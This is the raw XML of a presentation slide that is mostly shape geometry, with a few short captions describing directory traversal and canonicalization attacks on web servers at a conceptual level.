                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks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51835" y="1933193"/>
            <a:ext cx="1115250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Directory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traversal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another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type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injection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attack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performed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against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web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server.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5460" y="760476"/>
            <a:ext cx="12851892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6515100" y="3549396"/>
            <a:ext cx="7021195" cy="1173480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7021194" h="1173479">
                <a:moveTo>
                  <a:pt x="0" y="195579"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5162" y="150716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19868" y="109542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42947" y="73229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73229" y="42947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109542" y="19868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150716" y="5162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195579" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6825488" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6870351" y="5162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6911525" y="19868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6947838" y="42947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6978120" y="73229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7001199" y="109542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7015905" y="150716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7021067" y="195579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7021067" y="977900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7015905" y="1022763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7001199" y="1063937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6978120" y="1100250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6947838" y="1130532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6911525" y="1153611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6870351" y="1168317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6825488" y="1173479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195579" y="1173479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150716" y="1168317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109542" y="1153611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73229" y="1130532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42947" y="1100250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19868" y="1063937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5162" y="1022763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="977900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="195579"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="39405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711822" y="3700889"/>
            <a:ext cx="6626859" cy="79184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75"/>
              </a:spcBef>
            </a:pP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Attacker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obtains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access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files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outside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website</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
            </a:pP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ot</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-14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direct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ry.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15100" y="5283708"/>
            <a:ext cx="7021195" cy="1205865"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7021194" h="1205864">
                <a:moveTo>
                  <a:pt x="0" y="200913"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5304" y="154834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20414" y="112541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44127" y="75237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75237" y="44127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112541" y="20414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154834" y="5304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200914" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6820154" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6866233" y="5304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6908526" y="20414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6945830" y="44127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6976940" y="75237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7000653" y="112541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7015763" y="154834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7021067" y="200913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7021067" y="1004569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7015763" y="1050649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7000653" y="1092942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6976940" y="1130246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6945830" y="1161356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6908526" y="1185069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6866233" y="1200179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6820154" y="1205483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200914" y="1205483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154834" y="1200179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112541" y="1185069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75237" y="1161356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44127" y="1130246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20414" y="1092942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5304" y="1050649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1004569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="200913"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="39405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880986" y="5451838"/>
            <a:ext cx="6286500" cy="79184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75"/>
              </a:spcBef>
            </a:pP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Attacker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uses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canonicalization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attack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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hide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endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="3810">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
            </a:pP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malicious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input.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248154" y="3377438"/>
            <a:ext cx="4282440" cy="3210560"/>
            <a:chOff x="2248154" y="3377438"/>
            <a:chExt cx="4282440" cy="3210560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260854" y="3390138"/>
              <a:ext cx="3185160" cy="3185160"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3185160" h="3185159">
                  <a:moveTo>
                    <a:pt x="1592580" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1543888" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495559" y="2906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1447616" y="6507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400077" y="11514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1352965" y="17904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306300" y="25657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1260102" y="34752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214393" y="45168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1169193" y="56885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124524" y="69881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1080405" y="84137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1036859" y="99630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="993905" y="116341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="951565" y="134248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="909858" y="153330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868807" y="173568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828432" y="194939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788754" y="217423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749793" y="241000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711571" y="265648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674108" y="291347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="637425" y="318076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="601543" y="345814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566482" y="374540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532264" y="404233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498909" y="434873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466439" y="466439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434873" y="498909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404233" y="532264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374540" y="566482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345814" y="601543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318076" y="637425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291347" y="674108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265648" y="711571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241000" y="749793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217424" y="788754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194939" y="828432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173568" y="868807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153330" y="909858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134248" y="951565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116341" y="993905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99630" y="1036859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84137" y="1080405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69881" y="1124524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56885" y="1169193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45168" y="1214393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34752" y="1260102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25657" y="1306300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17904" y="1352965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11514" y="1400077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6507" y="1447616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2906" y="1495559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730" y="1543888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1592579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730" y="1641271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2906" y="1689600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6507" y="1737543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11514" y="1785082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17904" y="1832194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25657" y="1878859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34752" y="1925057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45168" y="1970766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56885" y="2015966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69881" y="2060635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84137" y="2104754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99630" y="2148300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116341" y="2191254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134248" y="2233594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153330" y="2275301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173568" y="2316352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194939" y="2356727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217423" y="2396405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241000" y="2435366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265648" y="2473588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291347" y="2511051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318076" y="2547734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345814" y="2583616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374540" y="2618677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404233" y="2652895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434873" y="2686250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466439" y="2718720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498909" y="2750286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532264" y="2780926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566482" y="2810619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="601543" y="2839345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="637425" y="2867083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674108" y="2893812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711571" y="2919511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749793" y="2944159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788754" y="2967736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828432" y="2990220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868807" y="3011591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="909858" y="3031829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="951565" y="3050911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="993905" y="3068818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1036859" y="3085529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1080405" y="3101022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124524" y="3115278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1169193" y="3128274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214393" y="3139991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1260102" y="3150407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306300" y="3159502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1352965" y="3167255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400077" y="3173645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1447616" y="3178652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495559" y="3182253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543888" y="3184429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1592580" y="3185160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641271" y="3184429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1689600" y="3182253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737543" y="3178652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1785082" y="3173645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1832194" y="3167255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1878859" y="3159502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1925057" y="3150407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1970766" y="3139991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015966" y="3128274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2060635" y="3115278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2104754" y="3101022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2148300" y="3085529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2191254" y="3068818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233594" y="3050911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2275301" y="3031829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2316352" y="3011591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2356727" y="2990220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2396405" y="2967736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2435366" y="2944159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2473588" y="2919511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2511051" y="2893812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2547734" y="2867083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2583616" y="2839345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2618677" y="2810619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2652895" y="2780926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2686250" y="2750286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718720" y="2718720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750286" y="2686250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2780926" y="2652895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2810619" y="2618677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2839345" y="2583616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2867083" y="2547734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2893812" y="2511051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2919511" y="2473588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2944159" y="2435366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2967735" y="2396405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2990220" y="2356727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3011591" y="2316352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3031829" y="2275301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050911" y="2233594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3068818" y="2191254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3085529" y="2148300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3101022" y="2104754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3115278" y="2060635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3128274" y="2015966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139991" y="1970766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150407" y="1925057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3159502" y="1878859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3167255" y="1832194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3173645" y="1785082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3178652" y="1737543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3182253" y="1689600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3184429" y="1641271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3185160" y="1592579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3184429" y="1543888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3182253" y="1495559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3178652" y="1447616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3173645" y="1400077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3167255" y="1352965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3159502" y="1306300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150407" y="1260102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139991" y="1214393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3128274" y="1169193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3115278" y="1124524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3101022" y="1080405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3085529" y="1036859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3068818" y="993905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050911" y="951565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3031829" y="909858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3011591" y="868807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2990220" y="828432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2967736" y="788754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2944159" y="749793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2919511" y="711571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2893812" y="674108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2867083" y="637425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2839345" y="601543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2810619" y="566482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2780926" y="532264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750286" y="498909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718720" y="466439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2686250" y="434873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2652895" y="404233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2618677" y="374540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2583616" y="345814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2547734" y="318076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2511051" y="291347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2473588" y="265648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2435366" y="241000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2396405" y="217424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2356727" y="194939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2316352" y="173568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2275301" y="153330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233594" y="134248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2191254" y="116341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2148300" y="99630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2104754" y="84137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2060635" y="69881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015966" y="56885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1970766" y="45168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1925057" y="34752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1878859" y="25657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1832194" y="17904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1785082" y="11514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737543" y="6507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1689600" y="2906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641271" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1592580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260854" y="3390138"/>
              <a:ext cx="3185160" cy="3185160"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3185160" h="3185159">
                  <a:moveTo>
                    <a:pt x="0" y="1592579"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="730" y="1543888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2906" y="1495559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6507" y="1447616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11514" y="1400077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17904" y="1352965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25657" y="1306300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34752" y="1260102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45168" y="1214393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56885" y="1169193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69881" y="1124524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84137" y="1080405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99630" y="1036859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116341" y="993905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134248" y="951565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153330" y="909858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173568" y="868807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194939" y="828432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217424" y="788754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241000" y="749793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265648" y="711571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291347" y="674108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318076" y="637425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345814" y="601543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374540" y="566482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404233" y="532264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434873" y="498909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466439" y="466439"/>
